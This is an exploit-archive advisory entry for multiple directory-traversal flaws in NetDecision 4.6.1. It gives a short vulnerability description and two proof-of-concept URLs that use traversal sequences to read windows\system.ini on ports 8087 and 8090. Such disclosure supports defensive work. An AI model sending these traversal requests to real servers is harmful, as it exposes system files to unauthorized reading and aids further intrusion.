NetDecision 4.6.1 - Multiple Directory Traversal Vulnerabilities



EKU-ID: 41436 CVE: OSVDB-79863 OSVDB-ID:
Author: Luigi Auriemma Published: 2012-03-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/52327/info

NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.

NetDecision 4.6.1 is vulnerable; other versions may also be affected.

http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini
http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini